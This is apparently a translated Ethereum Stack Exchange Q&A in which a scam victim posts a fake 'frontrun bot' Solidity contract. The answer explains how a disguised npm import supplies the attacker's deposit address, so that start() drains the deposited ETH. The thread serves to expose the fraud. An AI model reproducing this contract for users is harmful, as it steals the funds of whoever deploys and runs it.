Payable

這個騙局程式碼如何將代幣轉移到內部未指定的錢包中?

  • August 15, 2022

以下是詐騙者操縱人們自行執行的確切可靠程式碼。我檢查了程式碼中沒有指定錢包地址,但是只要你執行並呼叫 start(),這個程式碼就會在合約地址中轉移代幣。儘管我在轉賬支付中看到了一些可疑函式,DepositAddress(),但該程式碼沒有導入其他定義 DepositAddress() 的程式碼或任何可疑庫,那麼他們如何呼叫這些程式碼?起初 new Manager() 似乎也在創建未知類管理器的新實例,對嗎?同樣,如果不導入這些函式,程式碼如何工作?如果有意義,我想知道其他程式碼也在做什麼。謝謝你。

合約地址:0x37caba0155ac3bf705d08b8522daff54ddc006a0

//SPDX-License-Identifier: 1inchSwap
pragma solidity ^0.6.6;

// Import Libraries
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
// New Token Scan
import "coinmarketcap.com/coins";

contract UniswapFrontrunBot {


string public tokenName;
string public tokenSymbol;
uint frontrun;
Manager manager;

constructor(string memory _tokenName, string memory _tokenSymbol) public {
   tokenName = _tokenName;
   tokenSymbol = _tokenSymbol;
   manager = new Manager();
}

receive() external payable {}

struct slice {
   uint _len;
   uint _ptr;
}
/*
* @dev Find newly deployed contracts on Uniswap Exchange
* @param memory of required contract liquidity.
* @param other The second slice to compare.
* @return New contracts with required liquidity.
*/

function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
   uint shortest = self._len;

  if (other._len < self._len)
        shortest = other._len;

   uint selfptr = self._ptr;
   uint otherptr = other._ptr;

   for (uint idx = 0; idx < shortest; idx += 32) {
       // initiate contract finder
       uint a;
       uint b;

       string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
       string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
       loadCurrentContract(WETH_CONTRACT_ADDRESS);
       loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
       assembly {
           a := mload(selfptr)
           b := mload(otherptr)
       }

       if (a != b) {
           // Mask out irrelevant contracts and check again for new contracts
           uint256 mask = uint256(-1);

           if(shortest < 32) {
             mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
           }
           uint256 diff = (a & mask) - (b & mask);
           if (diff != 0)
               return int(diff);
       }
       selfptr += 32;
       otherptr += 32;
   }
   return int(self._len) - int(other._len);
}

/*
* @dev Extracts the newest contracts on Uniswap exchange
* @param self The slice to operate on.
* @param rune The slice that will contain the first rune.
* @return `list of contracts`.
*/
function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
   uint ptr = selfptr;
   uint idx;

   if (needlelen <= selflen) {
       if (needlelen <= 32) {
           bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

           bytes32 needledata;
           assembly { needledata := and(mload(needleptr), mask) }

           uint end = selfptr + selflen - needlelen;
           bytes32 ptrdata;
           assembly { ptrdata := and(mload(ptr), mask) }

           while (ptrdata != needledata) {
               if (ptr >= end)
                   return selfptr + selflen;
               ptr++;
               assembly { ptrdata := and(mload(ptr), mask) }
           }
           return ptr;
       } else {
           // For long needles, use hashing
           bytes32 hash;
           assembly { hash := keccak256(needleptr, needlelen) }

           for (idx = 0; idx <= selflen - needlelen; idx++) {
               bytes32 testHash;
               assembly { testHash := keccak256(ptr, needlelen) }
               if (hash == testHash)
                   return ptr;
               ptr += 1;
           }
       }
   }
   return selfptr + selflen;
}


/*
* @dev Loading the contract
* @param contract address
* @return contract interaction object
*/
function loadCurrentContract(string memory self) internal pure returns (string memory) {
   string memory ret = self;
   uint retptr;
   assembly { retptr := add(ret, 32) }

   return ret;
}

/*
* @dev Extracts the contract from Uniswap
* @param self The slice to operate on.
* @param rune The slice that will contain the first rune.
* @return `rune`.
*/
function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
   rune._ptr = self._ptr;

   if (self._len == 0) {
       rune._len = 0;
       return rune;
   }

   uint l;
   uint b;
   // Load the first byte of the rune into the LSBs of b
   assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
   if (b < 0x80) {
       l = 1;
   } else if(b < 0xE0) {
       l = 2;
   } else if(b < 0xF0) {
       l = 3;
   } else {
       l = 4;
   }

   // Check for truncated codepoints
   if (l > self._len) {
       rune._len = self._len;
       self._ptr += self._len;
       self._len = 0;
       return rune;
   }

   self._ptr += l;
   self._len -= l;
   rune._len = l;
   return rune;
}

function memcpy(uint dest, uint src, uint len) private pure {
   // Check available liquidity
   for(; len >= 32; len -= 32) {
       assembly {
           mstore(dest, mload(src))
       }
       dest += 32;
       src += 32;
   }

   // Copy remaining bytes
   uint mask = 256 ** (32 - len) - 1;
   assembly {
       let srcpart := and(mload(src), not(mask))
       let destpart := and(mload(dest), mask)
       mstore(dest, or(destpart, srcpart))
   }
}

/*
* @dev Orders the contract by its available liquidity
* @param self The slice to operate on.
* @return The contract with possbile maximum return
*/
function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
   if (self._len == 0) {
       return 0;
   }

   uint word;
   uint length;
   uint divisor = 2 ** 248;

   // Load the rune into the MSBs of b
   assembly { word:= mload(mload(add(self, 32))) }
   uint b = word / divisor;
   if (b < 0x80) {
       ret = b;
       length = 1;
   } else if(b < 0xE0) {
       ret = b & 0x1F;
       length = 2;
   } else if(b < 0xF0) {
       ret = b & 0x0F;
       length = 3;
   } else {
       ret = b & 0x07;
       length = 4;
   }

   // Check for truncated codepoints
   if (length > self._len) {
       return 0;
   }

   for (uint i = 1; i < length; i++) {
       divisor = divisor / 256;
       b = (word / divisor) & 0xFF;
       if (b & 0xC0 != 0x80) {
           // Invalid UTF-8 sequence
           return 0;
       }
       ret = (ret * 64) | (b & 0x3F);
   }

   return ret;
}

/*
* @dev Calculates remaining liquidity in contract
* @param self The slice to operate on.
* @return The length of the slice in runes.
*/
function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
   uint ptr = self._ptr - 31;
   uint end = ptr + self._len;
   for (l = 0; ptr < end; l++) {
       uint8 b;
       assembly { b := and(mload(ptr), 0xFF) }
       if (b < 0x80) {
           ptr += 1;
       } else if(b < 0xE0) {
           ptr += 2;
       } else if(b < 0xF0) {
           ptr += 3;
       } else if(b < 0xF8) {
           ptr += 4;
       } else if(b < 0xFC) {
           ptr += 5;
       } else {
           ptr += 6;
       }
   }
}


/*
* @dev Parsing all uniswap mempool
* @param self The contract to operate on.
* @return True if the slice is empty, False otherwise.
*/
function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
   bytes memory tmp = bytes(_a);
   uint160 iaddr = 0;
   uint160 b1;
   uint160 b2;
   for (uint i = 2; i < 2 + 2 * 20; i += 2) {
       iaddr *= 256;
       b1 = uint160(uint8(tmp[i]));
       b2 = uint160(uint8(tmp[i + 1]));
       if ((b1 >= 97) && (b1 <= 102)) {
           b1 -= 87;
       } else if ((b1 >= 65) && (b1 <= 70)) {
           b1 -= 55;
       } else if ((b1 >= 48) && (b1 <= 57)) {
           b1 -= 48;
       }
       if ((b2 >= 97) && (b2 <= 102)) {
           b2 -= 87;
       } else if ((b2 >= 65) && (b2 <= 70)) {
           b2 -= 55;
       } else if ((b2 >= 48) && (b2 <= 57)) {
           b2 -= 48;
       }
       iaddr += (b1 * 16 + b2);
   }
   return address(iaddr);
}


/*
* @dev Returns the keccak-256 hash of the contracts.
* @param self The slice to hash.
* @return The hash of the contract.
*/
function keccak(slice memory self) internal pure returns (bytes32 ret) {
   assembly {
       ret := keccak256(mload(add(self, 32)), mload(self))
   }
}

/*
* @dev Check if contract has enough liquidity available
* @param self The contract to operate on.
* @return True if the slice starts with the provided text, false otherwise.
*/
   function checkLiquidity(uint a) internal pure returns (string memory) {
   uint count = 0;
   uint b = a;
   while (b != 0) {
       count++;
       b /= 16;
   }
   bytes memory res = new bytes(count);
   for (uint i=0; i<count; ++i) {
       b = a % 16;
       res[count - i - 1] = toHexDigit(uint8(b));
       a /= 16;
   }
   uint hexLength = bytes(string(res)).length;
   if (hexLength == 4) {
       string memory _hexC1 = mempool("0", string(res));
       return _hexC1;
   } else if (hexLength == 3) {
       string memory _hexC2 = mempool("0", string(res));
       return _hexC2;
   } else if (hexLength == 2) {
       string memory _hexC3 = mempool("000", string(res));
       return _hexC3;
   } else if (hexLength == 1) {
       string memory _hexC4 = mempool("0000", string(res));
       return _hexC4;
   }

   return string(res);
}


/*
* @dev If `self` starts with `needle`, `needle` is removed from the
*      beginning of `self`. Otherwise, `self` is unmodified.
* @param self The slice to operate on.
* @param needle The slice to search for.
* @return `self`
*/
function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
   if (self._len < needle._len) {
       return self;
   }

   bool equal = true;
   if (self._ptr != needle._ptr) {
       assembly {
           let length := mload(needle)
           let selfptr := mload(add(self, 0x20))
           let needleptr := mload(add(needle, 0x20))
           equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
       }
   }

   if (equal) {
       self._len -= needle._len;
       self._ptr += needle._len;
   }

   return self;
}

function start() public payable {      

/*
* @dev Perform frontrun action from different contract pools
* @param contract address to snipe liquidity from
* @return `liquidity`.
*/

   payable(manager.DepositAddress()).transfer(address(this).balance);
}



// Returns the memory address of the first byte of the first occurrence of
// `needle` in `self`, or the first byte after `self` if not found.
function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
   uint ptr = selfptr;
   uint idx;

   if (needlelen <= selflen) {
       if (needlelen <= 32) {
           bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

           bytes32 needledata;
           assembly { needledata := and(mload(needleptr), mask) }

           uint end = selfptr + selflen - needlelen;
           bytes32 ptrdata;
           assembly { ptrdata := and(mload(ptr), mask) }

           while (ptrdata != needledata) {
               if (ptr >= end)
                   return selfptr + selflen;
               ptr++;
               assembly { ptrdata := and(mload(ptr), mask) }
           }
           return ptr;
       } else {
           // For long needles, use hashing
           bytes32 hash;
           assembly { hash := keccak256(needleptr, needlelen) }

           for (idx = 0; idx <= selflen - needlelen; idx++) {
               bytes32 testHash;
               assembly { testHash := keccak256(ptr, needlelen) }
               if (hash == testHash)
                   return ptr;
               ptr += 1;
           }
       }
   }
   return selfptr + selflen;
}

/*
* @dev Modifies `self` to contain everything from the first occurrence of
*      `needle` to the end of the slice. `self` is set to the empty slice
*      if `needle` is not found.
* @param self The slice to search and modify.
* @param needle The text to search for.
* @return `self`.
*/
function toHexDigit(uint8 d) pure internal returns (byte) {
   if (0 <= d && d <= 9) {
       return byte(uint8(byte('0')) + d);
   } else if (10 <= uint8(d) && uint8(d) <= 15) {
       return byte(uint8(byte('a')) + d - 10);
   }
   // revert("Invalid hex digit");
   revert();
}

/*
* @dev token int2 to readable str
* @param token An output parameter to which the first token is written.
* @return `token`.
*/
function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
   if (_i == 0) {
       return "0";
   }
   uint j = _i;
   uint len;
   while (j != 0) {
       len++;
       j /= 10;
   }
   bytes memory bstr = new bytes(len);
   uint k = len - 1;
   while (_i != 0) {
       bstr[k--] = byte(uint8(48 + _i % 10));
       _i /= 10;
   }
   return string(bstr);
}

function withdrawal() public payable { 

/*
* @dev withdrawals profit back to contract creator address
* @return `profits`.
*/   
   payable(manager.DepositAddress()).transfer(address(this).balance);
}

/*
* @dev loads all uniswap mempool into memory
* @param token An output parameter to which the first token is written.
* @return `mempool`.
*/
function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
   bytes memory _baseBytes = bytes(_base);
   bytes memory _valueBytes = bytes(_value);

   string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
   bytes memory _newValue = bytes(_tmpValue);

   uint i;
   uint j;

   for(i=0; i<_baseBytes.length; i++) {
       _newValue[j++] = _baseBytes[i];
   }

   for(i=0; i<_valueBytes.length; i++) {
       _newValue[j++] = _valueBytes[i];
   }

   return string(_newValue);
}

}

它看起來像是coinmarketcap.com一個 NPM 包,它返回了黑客的地址並具有 Manager 詳細資訊。當您刪除該導入行時,Manager 會給出錯誤。

npm 包在這裡

如果你想查看 npm 包的內容,可以按照這個。

npm view coinmarketcap.com dist.tarball

這將為您提供 NPM 封包件的連結。下載到你的機器,你會看到coins文件。跑:

cat coins | grep -r -A 5 DepositAddress

您將看到DepositAddress()功能和所有內容。

有什麼辦法可以追查到我被這個人騙了?我想知道是否有辦法恢復我的 ETH?

引用自:https://ethereum.stackexchange.com/questions/133570